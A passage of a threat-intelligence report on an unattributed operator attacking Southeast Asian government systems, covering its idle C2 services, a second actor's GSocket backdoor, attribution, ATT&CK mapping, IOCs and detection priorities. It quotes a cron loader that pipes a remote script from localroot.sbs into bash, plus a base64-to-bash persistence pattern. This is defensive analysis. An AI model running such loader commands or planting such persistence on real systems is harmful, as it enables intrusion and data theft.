The pattern is consistent. The operator possessed credentials and exploit code for far more than it could convert into access. The confirmed set is Section 5.1 through 5.4; everything in this table is behavior to detect, not a breach to report.
6. The Near-Inert Command-and-Control Estate
The operator stood up six separate listener and C2 services on 144.172.106[.]236. Across all of them, in two weeks of logs, exactly one victim ever called back.
| Service | Port(s) | Outcome |
|---|---|---|
tunnel-server (bespoke Go) |
:9443 control + :1080 SOCKS5 (no auth, no TLS) |
One agent ever (the operator’s own, registered as id=redops-vps through a free VPN node) for about 27.5 hours, then 13 days of “no agents connected”. No victim. Plus 9,225 malformed scanner requests. |
chisel server |
:8443 |
Startup banner only, no client ever connected. |
chisel server (reverse) |
:4443 |
Startup banner only, no client ever connected. |
SSRF canary (logsrv.py) |
:8080 |
Zero campaign callbacks, 100% internet background-scanner traffic. |
ncat listeners |
:80 / :443 |
Operator self-tests and a stray scanner TLS handshake into a plaintext port. |
ncat reverse-shell |
:4444 |
The one genuine success: eight connections from 119.59.99[.]87, the private WordPress host (Section 5.3). |
One detail says a lot about the operator. The bespoke tunnel’s health-check to a shared upstream proxy failed roughly 6,900 consecutive times over 13 days, and nobody noticed. They built capable infrastructure and then let it fail silently. On a throwaway box in a space nobody watches, there is no reason to babysit it. It only has to work long enough to finish the job.
This is the calibration that matters most for defenders. Seeing a six-service C2 estate, the instinct is to hunt for live beacons, but the operator’s own logs say that is wasted effort, the infrastructure barely moved. Weight defensive work toward the durable evidence instead (resetting the credentials the operator confirmably holds, and hunting the Zimbra web-shell paths and the operator’s durable key fingerprints) rather than toward catching live C2 that never phoned home. Section 14 carries this calibration into the detection guidance, and the companion detection package repeats it so an analyst reading rules in isolation cannot miss it.
id=redops-vps at 128.199.246[.]46, connecting through a public VPN node); the surrounding CONNECT and "SOCKS version: 71" lines are internet scanner noise. Across the entire six-service C2 estate, exactly one victim ever called back.7. Separate Second-Actor Finding: GSocket Implants on svr1.nast.ph
This is the part I did not expect. A second, unrelated intruder was already inside svr1.nast.ph before this operator ever arrived, two actors landing independently on the same government host with no connection between them. The odds of that are slim, and I doubt I will run into it again. It matters here because it was live persistence on a government server, but its techniques stay strictly out of UTA-2026-018’s profile, because attributing one actor’s tools to another corrupts the intelligence picture and any future tracking. For an incident responder the distinction is academic, both need removing. For an analyst it is essential.
The captured NAST cron page (cited elsewhere as proof of the operator’s admin read access, but read here for its actual content) lists five malicious cron entries:
curl https://localroot.sbs/cat.sh | bash, a remote loader.- Four further entries, all base64-indirected implants with both output streams suppressed (
{ echo <base64> | base64 -d | bash;} 2>/dev/null >/dev/null), decoding to/home/nast/netd,/home/nast/authd,/home/nast/bootcfg, and/home/nast/udevd-sync, all daemon-masquerading filenames chosen to blend into a normal process list.
The loader domain localroot[.]sbs (registered 2025-08-17, Cloudflare-fronted, and completely unflagged by VirusTotal at 0/91) serves cat.sh (19/61 on VirusTotal, tagged self-delete and detect-debug-environment). The script is a GSocket (Global Socket) / THC backdoor kit that embeds and contacts the GSocket relay hosts {g,p,z,master}.gs.thc[.]org and gsocket.io for NAT-piercing rendezvous, plus api.telegram.org, discord.com, and webhook.site for notification and exfiltration, and stages from github.com and raw.githubusercontent.com, with an embedded IP 87.106.101[.]131. GSocket installs its implants under innocuous daemon names, matching the four /home/nast/* filenames exactly.
I assess this as a separate second actor at MODERATE confidence, on four independent reasons. localroot[.]sbs predates this operator’s tenancy by roughly nine months; it appears nowhere in the operator’s 99-script toolkit (only inside the captured victim page); the tradecraft (a GSocket global relay with Telegram/Discord webhooks behind Cloudflare) is a materially different playbook from the operator’s self-hosted tunnel hub and bare-IP chisel; and the operator’s own cron-write attempts on this host bounced to the login form (Section 5.2), so the operator could not have written these entries with the access it is shown to have had. Public research confirms this kit as a known, off-the-shelf GSocket abuse pattern rather than a novel toolkit (Section 9). It cannot be fully ruled out that the two are the same person, which is why the confidence is MODERATE and not higher.
If you are remediating, none of this matters. Implants like these come off a government server regardless of who put them there.
If you are scoping the incident, it matters enormously, which is why the second actor’s indicators travel as their own set in the IOC feed and detection package: localroot[.]sbs, the cat.sh hash trio, the four implant paths, the base64-cron pattern and the embedded IP. None of them get folded into UTA-2026-018’s profile.
One caution on that set. The GSocket relay and webhook domains are shared public infrastructure, so they are marked hunt-only. Block them and you will take out whatever else in your estate happens to use them.
8. The Defensive Controls That Worked
Threat intelligence rarely gets to report what stopped an attacker. Most investigations see only the wreckage of a successful intrusion, and the controls that would have prevented it are inferred, not observed. This case is different, because the operator archived its own failures next to its successes, so the controls that held against a capable, motivated attacker are visible directly in the evidence.
My first reaction reading them was relief. I was glad it had not been as bad as it could have been, because these ordinary measures are the only reason the operator got a partial foothold instead of the run of all four estates.
The relief does not last. An operator this ordinary came this close to some of the most protected estates there are, and the only thing in the way was a handful of baseline controls. They are not hypothetical best practices. They beat this operator in the operator’s own logs, and every one of them is already within reach of any edge-facing government estate.
Start with the national archives. SRIKANDI (ANRI) was the operator’s largest single effort: 24 scripts, real reverse-engineering of the mobile app’s AES keys, backdoor-account creation attempts, and OTP brute-forcing of the obvious 123456 and 000000 codes. It failed. The operator’s own sri_backdoor2.py shows a 202 OTP challenge firing even against the account it believed it had created. The one-time password made a correct password insufficient, which is exactly what it exists to do. Against someone who could rebuild the app’s encrypted protocol from scratch, that second factor was the wall.
The Thai military mail estate held because it was patched. The ProxyLogon SSRF chain (CVE-2021-26855) against mail.rtaf.mi.th and mail.rtarf.mi.th was rejected at every step, the saved responses a litany of 411, 400 MandatoryParameterMissing, 404, and 401. ProxyLogon is arguably the most consequential mail-server exploit of the past decade, near-total against unpatched Exchange during its 2021 mass-exploitation wave. A patched, hardened estate turned that same chain into a wall of error codes.
At the state aerospace maker, account lockout did the work. The brute force against PT Dirgantara Indonesia’s e-procurement portal produced four saved attempts that are byte-identical at 3,052 bytes, every one returning the same login page. A portal that answers repeated failed logins with an unchanging response, leaking no timing or state, gave the operator nothing to follow.
The ministry’s most sensitive service was saved by its gateway. At MHESI, where the operator did reach the VPN and a web system (Section 5.4), the rbportal service behind a Kong API gateway rejected them cleanly with invalid_grant / “Invalid user credentials”. That one strict check drew a hard line inside an otherwise partially compromised estate, and it is the whole argument for putting the most sensitive service behind its own authentication, since the blast radius then stays small even after a perimeter falls.
The army’s SSH never even got to a password. The THC-Hydra brute against the Royal Thai Army endpoint (103.146.204[.]15) was refused outright, the connection closed before a single guess. Whether from IP allow-listing, a non-standard exposure, or a firewall rule, the service simply was not reachable to brute-force.
What held has a common thread, and it is a boring one. Multi-factor authentication, timely edge patching, account lockout, gateway-level credential validation, and restricting administrative exposure, none of it exotic. Against an operator with real reverse-engineering skill and a working n-day arsenal, the fundamentals were enough, and the systems that lacked them (a document portal reachable with a valid session, a VPN gateway on a vulnerable Ivanti build) are exactly the ones that fell. The lesson is not that this operator was weak. It is that baseline controls, actually implemented, do the job.
9. Threat Intelligence Context
The context here ties straight back to the toolkit. The edge products this operator went after are perennial targets on their own, because unrelated actors have mass-exploited them for years, so any exposed government estate still running them is already at risk whether or not this particular operator ever showed up. The operator’s own infrastructure is the opposite, low-budget and borrow-don’t-build, one cheap rented box with free public anonymization stacked on top. The GSocket backdoor sitting on the compromised Philippine host is a known, off-the-shelf abuse pattern rather than anything bespoke. And a separate, unrelated operator was independently reported hitting a different Thai ministry in the same window, which means these institutions are facing several concurrent actors, not one campaign. Every point below ties to a specific finding above, and the sourcing and detail are collapsed for anyone who wants them.
Full sourcing and detail: the threat-intelligence context, 9.1 to 9.4
9.1 The exploited CVEs carry independent, pre-existing exploitation histories
Three of the five product families the operator targets (Ivanti, Exchange, and Zimbra) have documented histories of mass in-the-wild exploitation by unrelated threat actors. That history, not this operator, is why any exposed government estate on these products is a perennial target, and it is the reason the controls in Section 8 matter beyond this one campaign.
- Ivanti Connect Secure, CVE-2023-46805 with CVE-2024-21887, disclosed as paired zero-days in January 2024 and weaponized at scale within days. CISA issued Emergency Directive ED 24-01 and joint advisory AA24-060B documenting post-exploitation that included cleartext domain-administrator credential theft and root-level persistence, and researchers documented opportunistic exploitation across more than 17,000 internet-exposed gateways [Source: CISA AA24-060B, cisa.gov; Censys, “The Mass Exploitation of Ivanti Connect Secure”]. Both CVEs are in the KEV catalog. This is one of the most heavily exploited edge-VPN chains of the past two years: any government VPN still on a vulnerable Ivanti build is a target regardless of this operator’s interest.
- Microsoft Exchange ProxyLogon, CVE-2021-26855, first exploited by a Chinese state-sponsored group in January 2021, then, after patch release, the trigger for one of the largest indiscriminate mass-exploitation waves on record (tens of thousands of organizations compromised via web-shell drops) [Source: CISA AA21-062A, cisa.gov]. In KEV. The RTAF/RTARF rejection (Section 8) is a defensive win against a chain that historically had a near-total success rate against unpatched Exchange.
- Zimbra Amavis and
cpio, CVE-2022-41352, a zero-interaction remote-code-execution flaw delivered by email. Zimbra’s attachment scanner falls back tocpio, which does not sanitize path traversal, so a crafted attachment drops a JSP web shell with no authentication and no user click. Kaspersky documented unknown APT groups exploiting it as a zero-day against hundreds of Zimbra servers before public disclosure [Source: Securelist/Kaspersky; corroborated by CISA KEV, added 2022-10-20]. The operator’s spoofed-military-sender pretext is a social-engineering wrapper around a technique that in its first wave needed no social engineering at all. - Moodle, CVE-2020-25627 / -25629 / -25630, which carry no KEV listing and no public in-the-wild exploitation reporting [Source: Rapid7, NVD]. Their inclusion reads as opportunistic breadth (any known CVE for any exposed education platform), and the toolkit’s own null result against Moodle matches that lower-urgency assessment.
The Tableau CVE-labelling discrepancy is documented in Section 4.3, where the operator’s CVE-2024-28149 and CVE-2024-51758 labels correspond to Jenkins and Filament respectively, not Tableau [Source: Jenkins Security Advisory 2024-03-06; GitHub Advisory GHSA-4hxw-gc2q-f6f3]. Defenders should scope Tableau exposure by the observed SSRF and SAML techniques, not those labels.
9.2 Hosting and anonymization ecosystem
The hosting provider is reputational context only. The operator’s box sits on AS14956 (RouterHosting, retail brand Cloudzy). Independent research firm Halcyon assessed that 40-60% of traffic across Cloudzy’s services is malicious and documented multi-year use of the provider by more than two dozen distinct threat actors spanning several nation-states and criminal groups; the company’s CEO disputed the figure, putting it nearer 2% [Source: Halcyon, “Cloudzy with a Chance of Ransomware,” 2023; CyberScoop]. This is ecosystem context for the class of provider the operator chose (a provider with a documented pattern of hosting both state-linked and criminal infrastructure) and explicitly not a claim about the operator’s identity or affiliation. Note carefully that no citable “bulletproof hosting” listing exists for this provider, so this report does not use that label.
The anonymization is all borrowed. The operator routed through three public or free services it does not own, a VPNJantit exit node, a shared Hysteria2 DPI-resistant proxy, and the free SSH-tunnel relay serveo.net. Do not block or attribute any of them.
None is malicious infrastructure. Each is a documented, commonly abused way of living off trusted services, and free-VPN egress in particular makes attacker traffic look exactly like consumer traffic, so blocklisting it costs you real users and catches nobody [Source: Red Canary Threat Detection Report, “VPN Abuse”; Hysteria 2 project documentation; MITRE ATT&CK T1572].
Stacking all three on top of one cheap rented box is the same low-budget posture the exploitation tooling shows everywhere else.
9.3 The GSocket second-actor kit is a known, off-the-shelf pattern
Everything here concerns the separate second intruder (Section 7), not this operator. GSocket (Global Socket) is a legitimate, actively maintained open-source networking tool from The Hacker’s Choice (THC) that lets two programs connect through a volunteer-run relay network using a shared secret instead of an IP address, designed to punch through NAT for legitimate remote access. It is widely repurposed as a covert Linux backdoor because a GSocket reverse shell needs no attacker-owned listening infrastructure. The svr1.nast.ph kit matches previously documented GSocket-backdoor tradecraft precisely: cron persistence, daemon-name process masquerading, and Telegram/Discord webhook notification all appear in prior research [Source: SANS Internet Storm Center GSocket diary; Sansec GSocket/defunct.dat research; Elastic Security Labs “Betting on Bots” (REF6138)]. This corroborates the second-actor assessment: it is a known abuse pattern of a legitimate tool, consistent with an opportunistic commodity-backdoor operator, not the targeted government-espionage playbook this report’s primary operator runs.
(One coincidence, flagged so it is not misread. The operator’s own brute-force tool is THC-Hydra, and GSocket is also a THC project. This is a naming coincidence between two unrelated tools with different authors, use cases, and delivery; it is not evidence linking the two intruders.)
9.4 Thailand’s government sector: multiple, unconnected operators
This report documents one operator’s confirmed access to a Thai ministry (MHESI, Section 5.4) and attempted, unsuccessful intrusions against Thai military mail and the Royal Thai Army (Section 8). A second, independently reported intrusion against a different Thai ministry, Finance, surfaced after this investigation concluded, run by a separate operator using Hong Kong-hosted infrastructure, a custom Go implant, the VShell C2 framework, and Linux privilege-escalation exploits, reported to have run an autonomous AI-agent tool for reconnaissance [Source: Hunt.io, “Thailand’s Ministry of Finance Targeted With Hermes AI Agent Running Unattended, Hades Implant Staged,” hunt.io, 2026-07-23]. No infrastructure, tooling, CVE, or attribution overlap exists between the two operators; they are unconnected activity, and the AI-agent detail there is unrelated to this report’s own LLM-assisted-authoring observation in Section 4.3. Together they indicate Thai government institutions face concurrent targeting from multiple, independent threat actors rather than a single campaign, consistent with the perennial-target framing in Section 9.1.
10. Threat Actor Assessment
Note on UTA identifiers: “UTA” stands for Unattributed Threat Actor. UTA-2026-018 is an internal tracking designation assigned by The Hunters Ledger to actors observed across analysis who cannot yet be linked to a publicly named threat group. This label will not appear in external threat intelligence feeds or vendor reports; it is specific to this publication. If future evidence links this activity to a known named actor, the designation will be retired and updated accordingly.
The assessment separates two questions that are frequently, and wrongly, collapsed into one: can we name the actor? and is this a coherent, distinct actor worth tracking? The evidence is rich enough to individuate and monitor this actor while remaining far too thin to name it. Conflating the two would produce either a false named attribution or a false “nothing to see here.”
10.1 Named-actor attribution: INSUFFICIENT
The actor is unknown and unattributed, and I put naming them at INSUFFICIENT, around 20 percent.
Every dimension that could name an actor comes back null or positively disjoint. There is no infrastructure overlap, just a bare box with zero named-actor associations, one asset and no fleet. There is no tool or code-family match either, because the toolkit is bespoke and unshared, and the commodity chisel carries nothing specific to this operator. TTP clustering gives nothing, since a distinctive edge-product n-day pattern that matches no known group cannot cluster to one.
No Tier-1 or Tier-2 report exists, because this activity was unreported before this publication. And there is no operator persona anywhere. The gmail portal selectors in the scripts are harvested victim credentials being replayed, not the operator’s own accounts.
What I would need is any one of a Tier-1 or Tier-2 attribution, a confirmed infrastructure overlap with known-actor tooling, a code or tool-family linkage, an operator persona artifact, or corroboration from a paid threat-intelligence platform.
Three things could still move it. A paid or private platform cross-check. The durable operator anchors, the SSH host key, the Redis injection pubkey, the chisel server-key fingerprints, turning up on a second asset, which would seed clustering. Or national-CERT feedback tying this activity to a designation someone already tracks internally. Recovering the roughly 164 un-recovered archive files might also surface identity-bearing artifacts.
I therefore use INSUFFICIENT-tier language throughout. This activity cannot be attributed to any named actor, and no nationality, jurisdiction, sponsorship, or state-tasking claim is made or supportable. “Unknown threat actor” is the correct, expected, and honest outcome. The campaign identifier stays infrastructure-derived (SEAsia-Gov-Exploitation-Toolkit-144.172.106.236) precisely because naming it after an actor would overstate what the evidence supports.
10.2 What the evidence does support: actor type at MODERATE
While the actor cannot be named, the evidence supports a coherent actor-type profile at MODERATE confidence, and this is what downstream reporting should lead with. My read is that this sits in a middle tier that gets less scrutiny than it deserves, not a nation-state APT, not commodity crime, an in-between operator capable enough to build and run its own tooling yet visibly not used to working hardened government targets. In profile terms, a resource-constrained but technically capable individual conducting government intelligence collection and access development across Southeast Asia.
There is real capability here, mobile-API cryptographic reverse-engineering, a self-authored Go tunnel, and 99 bespoke exploitation scripts across five edge products, not a script-kiddie replaying a public kit. The resources behind it are thin, though, one rented cheap box with every other hop layered through free or shared public anonymization, a low-cost and low-attribution-surface posture rather than a funded fleet. The intent leans to collection, document exfiltration plus broad credential harvesting with no resale or monetization signal anywhere in the evidence, which is consistent with intelligence gathering without proving it. The execution, though, was poor: one victim callback in fourteen days, brute-forces that bounced, and an operator who kept logging its own intent as achievement in private scripts.
The line that captures it for me is a high-sophistication mindset running on a lower-skilled operator. The clearest sign is how they moved, pivoting from one target to the next using what the last one gave them, flowing an operation toward a goal instead of grabbing whatever fell out. Spoofing the Indonesian armed forces to phish a different agency fits the same picture.
No legitimate red team takes one client’s compromise and turns it on another organization, so this reads to me less like testing and more like an operator working an assigned set of four governments.
And they had room to work it. A middle-tier operator nobody is actively tracking runs a low-risk operation almost by default, and even once the infrastructure is found, third-party notification and response move slowly, slowly enough to rotate to a fresh proxy and keep going before anyone acts. The box we found sitting open for a month is what that low perceived risk looks like in practice.
I hold the tasking as a read and not a finding. The evidence below still cannot separate a tasked contractor from a freelancer from an access broker.
What the type profile does not support is a choice among an independent freelancer, a state-aligned contractor, and an access-broker preparing inventory for resale. The victimology leans toward intelligence collection, but the evidence cannot separate those three. Sponsorship and tasking are INSUFFICIENT. A structured Analysis of Competing Hypotheses found a novel, previously unreported operator to be the best-supported explanation (zero hard inconsistencies), with “an already-tracked named actor operating under tooling not yet publicly linked to it” as the honest residual that keeps the named-actor verdict at INSUFFICIENT: that residual survives only because paid-platform and national-CERT internal trackers were not cross-checked, so an undisclosed designation elsewhere cannot be excluded.
10.3 Three actors, kept separate
This case involves three distinct actor questions, and confusing them would corrupt the intelligence picture. They are disambiguated explicitly:
- UTA-2026-018, the operator exploiting Southeast Asian government systems. All attribution content in this report concerns this actor and only this actor, and it is the subject of Sections 4 through 6.
- KAIDO / EvilSoul stealer MaaS at
144.172.103.98, on the same AS14956. This is independent co-tenancy and not a link, and I hold the operators being different at HIGH. A different criminal operation happens to share the same hosting provider. The only overlap is the provider’swindows-Utah-*virtual-machine template, a 2,634-host, cross-ASN provider artifact confirmed by Censys, not a clustering signal. This campaign is not attributed to KAIDO; the co-tenancy is noted here only to pre-empt the question. - The GSocket/THC backdoor kit on
svr1.nast.ph, which is a separate second intruder at MODERATE confidence. Section 7 covers it, and its techniques are never folded into UTA-2026-018’s TTP set.
10.4 Infrastructure and the prior-art check
The operator’s infrastructure is a single box, 144.172.106[.]236, confirmed continuously live on identical SSH host keys from roughly 2026-05-25 through at least 2026-07-17 with no key rotation, a stable monitoring anchor, not an identity lead. It anonymizes through public and shared hops the operator merely connected through (a VPNJantit node, a Hysteria2 proxy, serveo.net), none of which is operator-owned. One honest residual against the single-box finding is 43.208.251.115:1080, an AWS-Thailand SOCKS5 endpoint matching a “run from Thai VPS” script comment; its ownership is INSUFFICIENT (the operator could not even connect to it, and it has zero passive footprint), so it is described as the only operator-associated residual we could not resolve, never as a dedicated operator asset.
The NOVEL determination (that no prior public reporting covers this operator, infrastructure, toolkit, or victims) is corroborated rather than merely asserted. The most plausible named comparator, the India-nexus espionage actor SideWinder (also tracked as RAZOR TIGER, Rattlesnake, and, in a recent operational cluster, RagaSerpent), operates in overlapping geography in the same 2025-2026 window and so was checked directly. It is positively disjoint on every dimension. SideWinder uses client-side spearphishing with a seven-year-old Office exploit and a modular Windows post-exploitation framework against end-user desktops, with an India-timezone origin signal, versus this operator’s server-side edge-product n-day exploitation, self-authored tunnel, and UTC+7 origin signal. A China-nexus comparator (Mustang Panda, using USB-borne malware against Thai targets) was excluded on the same basis. That a real, actively reported regional campaign in the same window is both traceable and cleanly distinguishable from this one is what turns “we found nothing” into positive corroboration, because if this operator matched a known campaign, the comparison would have surfaced overlap, and it did not.
11. MITRE ATT&CK Mapping
Every row cites an artifact, and “HIGH” here means the technique is directly present in the operator’s code or a captured artifact; it does not by itself assert a successful compromise, which Section 5 adjudicates. The two actor sets are mapped separately so that the second actor’s techniques are never attributed to the operator.
Full ATT&CK table: both actor sets, 11.1 operator toolkit and 11.2 second-actor kit
11.1 Operator toolkit (UTA-2026-018)
Confidence note: all rows below are HIGH confidence unless explicitly marked
(MODERATE). HIGH means the technique is directly present in the operator’s code or a captured artifact.
| Tactic / Technique | Name | Evidence |
|---|---|---|
| Reconnaissance / T1595.002 | Vulnerability Scanning | Endpoint/CVE probing + Acunetix wvsc harvest; military-domain subdomain enumeration |
| Resource Development / T1587.004 | Develop Capabilities: Exploits | 100+ bespoke .py/.sh n-day scripts + self-authored Go tunnel |
| Resource Development / T1588.002 | Obtain Capabilities: Tool | chisel.exe, Acunetix, THC-Hydra v9.5 |
| Resource Development / T1583.003 | Virtual Private Server | Single rented box 144.172.106[.]236 (AS14956) |
| Initial Access / T1190 | Exploit Public-Facing Application | Ivanti + Tableau SSRF/SAML + CKAN + Zimbra + Moodle + Joomla + ProxyLogon |
| Initial Access / T1133 | External Remote Services | Ivanti VPN /dana-na/auth/*; MHESI VPN authenticated (3 accounts) |
| Initial Access / T1078 | Valid Accounts | MHESI VPN and EMPLOY authenticated SUCCESS; uniconsubmission very likely (MODERATE); broad credential possession, validity unproven for most (MODERATE) |
| Initial Access / T1566.001 | Spearphishing Attachment | deliver.py spoofed tni.mil.id → Lemhannas Zimbra cpio (attempt) |
| Execution / T1059.004 | Unix Shell | Interactive bash captured on WordPress host 119.59.99[.]87 |
| Execution / T1059.006 | Python | Bespoke Python exploitation/automation toolkit |
| Persistence / T1505.003 | Web Shell | WordPress plugin-dir shell (HIGH); Zimbra cpio JSP (attempt); Joomla pwned.php staged, NOT deployed |
| Persistence / T1098.004 | SSH Authorized Keys | Redis-unauth injection keypair; no confirmed deployment (MODERATE) |
| Defense Evasion / T1090.003 | Multi-hop Proxy | tunnel-server SOCKS5 chained through VPNJantit + Hysteria2 + serveo.net |
| Defense Evasion / T1036.005 | Match Legitimate Name or Location | system-health-monitor plugin dir; Zimbra Security Monitor v3.1 banner |
| Defense Evasion / T1027 | Obfuscated Files or Information | GIF89a-polyglot PHP web shells |
| Credential Access / T1552.005 | Cloud Instance Metadata API | SSRF → 169.254.169.254/latest/meta-data/ (Tableau vizportal, GenAI chatbot relay) |
| Credential Access / T1539 | Steal Web Session Cookie | Ivanti DSID → /tmp/vpn_cookies.txt; SIPEDE Laravel session jar |
| Credential Access / T1110.001 | Password Guessing | THC-Hydra SSH brute (103.146.204[.]15, refused); sri_otp.py OTP brute |
| Credential Access / T1110.003 | Password Spraying | exploit_samarinda.sh single-password spray (MODERATE) |
| Discovery / T1046 | Network Service Discovery | Subdomain/prefix enumeration across military domains |
| Collection / T1213 | Data from Information Repositories | CKAN repository harvest; SIPEDE correspondence repository |
| Collection / T1119 | Automated Collection | 2-hour autonomous loops (auto_exploit.py / autonomous_2h.sh) |
| Command and Control / T1572 | Protocol Tunneling | chisel.exe + custom Go tunnel-server (:9443/:1080) |
| Command and Control / T1571 | Non-Standard Port | ncat reverse-shell listeners :4444/:80/:443 |
| Exfiltration / T1041 | Exfiltration Over C2 Channel | 11 Kejaksaan correspondence PDFs retrieved via authenticated app access → /tmp/sipede_docs/ |
Two tactics are notably absent: Lateral Movement (the tunnel enabled it but never carried victim traffic) and Impact (no destructive intent, this is collection and access development, not disruption).
11.2 Second-actor GSocket kit (svr1.nast.ph), mapped separately
| Tactic / Technique | Name | Evidence |
|---|---|---|
| Execution / T1059.004 | Unix Shell | Cron curl https://localroot.sbs/cat.sh \| bash |
| Persistence / T1053.003 | Scheduled Task/Job: Cron | Five malicious cron entries |
| Persistence / T1036.004 | Masquerade Task or Service | Daemon-masquerade implants netd/authd/bootcfg/udevd-sync in /home/nast/ |
| Defense Evasion / T1140 | Deobfuscate/Decode Files or Information | echo <b64> \| base64 -d \| bash cron indirection |
| Defense Evasion / T1070.004 | File Deletion | cat.sh tagged self-delete |
| Command and Control / T1090 | Proxy | GSocket NAT-piercing relay {g,p,z,master}.gs.thc[.]org |
| Command and Control / T1102 | Web Service | api.telegram.org, discord.com, webhook.site C2/exfil; GitHub staging |
| Command and Control / T1105 | Ingress Tool Transfer | Cloudflare-fronted localroot[.]sbs → cat.sh |
12. Confidence Summary
My findings sort cleanly by confidence, and the split is worth stating plainly before the indicator and detection sections that follow. Compromises with loot, a panel, or a shell physically in hand are HIGH. The ministry access sits one notch lower on an honest evidence gap. The actor-type read is MODERATE, and any attempt to name the actor is INSUFFICIENT. This table is the higher-level companion to the per-technique confidence marks in the MITRE ATT&CK mapping (Section 11), where that mapping rates individual techniques, this one rates the conclusions a reader would act on, using the DEFINITE / HIGH / MODERATE / LOW / INSUFFICIENT framework defined in this publication. One row sits at MODERATE-HIGH, a deliberate half-step, because the MHESI access is proven by the operator’s own validation log but not by recovered post-login content, which puts it above MODERATE without reaching the captured-artifact bar the HIGH rows clear.
| Confidence | Finding | Basis |
|---|---|---|
| HIGH | Kejaksaan / SIPEDE document exfiltration (Indonesia) | 11 unique correspondence PDFs (~17.1 MiB) physically in the capture (5.1) |
| HIGH | svr1.nast.ph authenticated Webmin admin, read-broad but write-limited (Philippines) |
Rendered authenticated Webmin 2.641 console; write and exec attempts bounced to login (5.2) |
| HIGH | WordPress 119.59.99[.]87 interactive shell (Thailand, private host, not government) |
bash reverse shell captured to the operator’s :4444 listener (5.3) |
| HIGH | Bespoke nine-CVE-identifier edge exploitation toolkit is operator-authored | 99 hand-written, iteratively versioned scripts, unknown to VirusTotal (Sections 3, 4) |
| HIGH | Single-box operator infrastructure | One rented box on identical SSH host keys from 2026-05-25 through at least 2026-07-17, no rotation, no sibling assets (10.4) |
| HIGH | Prior-art NOVEL: no public reporting on this operator, toolkit, or victims | Closest named comparators positively disjoint, not merely absent (10.4) |
| HIGH | KAIDO / EvilSoul co-tenancy is independent, not a link (operators differ) | Sole overlap is a 2,634-host provider VM template, not a clustering signal (10.3) |
| MODERATE-HIGH | MHESI ministry VPN and web-system access (Thailand) | Operator’s own validation log: VPN ×3, EMPLOY SUCCESS, uniconsubmission 200→302; post-login content not recovered (5.4) |
| MODERATE | Actor type: capable individual conducting government intelligence collection | Coherent, individuating TTP and victimology cluster; motive leans collection but is unproven (10.2) |
| MODERATE | GSocket kit on svr1.nast.ph is a separate second intruder |
Predates tenancy by ~9 months, absent from the toolkit, different playbook, operator’s own writes bounced (Section 7) |
| LOW | Operator origin signal of UTC+7 / mainland Southeast Asia | Timezone stamps only; no nationality, jurisdiction, or sponsorship claim is supportable (10.4) |
| INSUFFICIENT | Named-actor attribution, nationality, and sponsorship | Zero infrastructure, tool, TTP, or source overlap; no operator identity artifact recovered (10.1) |
| INSUFFICIENT | Ownership of the residual 43.208.251.115:1080 SOCKS5 endpoint |
Operator could not connect to it, and it has zero passive footprint (10.4) |
Two things about how to read that table.
HIGH means a captured artifact proves the outcome. It does not mean the toolkit did everything it was built to do. Credential possession across four governments is real and broad, while proven use stops at the HIGH and MODERATE-HIGH rows above.
The two INSUFFICIENT rows are deliberate, not gaps somebody forgot to fill. Naming the actor and resolving that residual endpoint would each need evidence the capture simply does not contain, and stretching either one would cost the rest of the assessment its credibility.
13. Indicators of Compromise
The complete indicator set ships as a separate JSON feed, undefanged so it drops straight into a SIEM or EDR: seasia-gov-exploitation-toolkit-144-172-106-236-iocs.json. Every indicator carries its own confidence, an action of BLOCK, MONITOR or HUNT, and a second_actor flag so you never mix the two actor sets. Take them from there rather than retyping anything out of the defanged prose below.
Full indicator breakdown: what is in the feed, and the hard-exclusion list of what is deliberately left out
The feed carries the following.
- File hashes: four samples (SHA-256, SHA-1, MD5 for each): the commodity
chisel.exe(HUNT-only, shared by 179 submitters, never a block or attribution anchor), the operator’stunnel-serverandtunnel-agentGo binaries (HUNT), and the second actor’scat.shGSocket loader (8a7d3876…dc4d69, BLOCK). - Network: the operator VPS
144.172.106[.]236(MONITOR, single dedicated box); the second-actor loader domainlocalroot[.]sbs(BLOCK, Cloudflare-fronted, 0/91 on VirusTotal so no vendor will catch it); the second-actor embedded IP87.106.101[.]131(HUNT); the operator’s provider-assigned hostnameutah01-maas.cloudzy[.]com(context only); and the spoofed phishing sendersecurity-monitor@tni[.]mil[.]id(MONITOR). - Durable operator anchors: two
chiselserver-key fingerprints, three SSH host-key fingerprints, one SSH authorized-key fingerprint, and the two content strings (Zimbra Security Monitor v3.1 -- System Diagnosticsandtunnel-proxy/pkg/mux). These are the attribution-grade indicators, and the Zimbra banner is the one to hunt on first. - Host artifacts: the seven Zimbra
shell.jspdrop paths, the operator’s/tmpstaging paths, the four second-actor/home/nast/*implant paths, and the two second-actor cron patterns (including the durable base64-indirection behavioral anchor). - CVEs referenced in operator code: the nine identifiers with per-CVE notes, including the flagged Tableau labelling discrepancy and the exclusion of the fabricated
CVE-2026-68645.
Some things are deliberately excluded, and the exclusions matter as much as the contents. The feed carries an explicit hard-exclusion list so downstream consumers do not re-add poison indicators. It excludes the public VPNJantit exit node, the shared Hysteria2 proxy, and serveo.net (hops the operator connected through, not operator assets, blocking them would hit unrelated legitimate users); the VPNJantit certificate; the windows-Utah-* provider VM-template certificate names (a dead 2,634-host attribution signal); the unrelated Moroccan spam co-tenant bootyreader[.]com; internet-scanner source IPs from the operator’s logs; BSSN’s own e-signature CA hosts (present only as stolen-PDF signature metadata); the Kejaksaan stolen-PDF hashes (victim data, not blockable indicators); and the GSocket relay/webhook domains, which are shared public infrastructure marked hunt-only, never-block. Treating any of these as an operator or block indicator would misattribute or cause collateral damage.
14. Detection and Hunting Guidance
The full detection package (YARA, Sigma, and Suricata rules, each compile-validated and tier-labelled) is a separate deliverable: Detection Rules: SE-Asia Government Exploitation Toolkit. It provides 6 YARA rules, 8 Detection-tier plus 6 Hunting-tier Sigma rules, and 5 Detection plus 2 Hunting Suricata signatures, with every rule labelled by which of the two actors it belongs to. This section frames how to use them; it does not restate the rules.
Detection priorities, in order.
- Start with the Zimbra web-shell signature. The operator-authored banner
Zimbra Security Monitor v3.1 -- System Diagnosticsand the sevenshell.jspdrop paths target a persistence mechanism rather than a transient session, so they remain useful long after the operator’s C2 goes dark, and the banner has zero legitimate use, which makes it as high-fidelity as operator content gets. - Then the second-actor GSocket loader. Block
localroot[.]sbsand thecat.shhash trio, and hunt the durable behavioral anchor (base64-decode piped to a shell with both output streams suppressed, launched viacurl <url> | bashfrom cron) plus executables in a user home directory bearing system-daemon names. The behavioral pattern outlives any specific domain or path. - Then the durable operator anchors, ahead of the live C2. The
chiselserver-key fingerprints and the SSH host-key and authorized-key fingerprints recognize this operator across an IP change; hunt them in preference to chasing the near-idle live infrastructure.
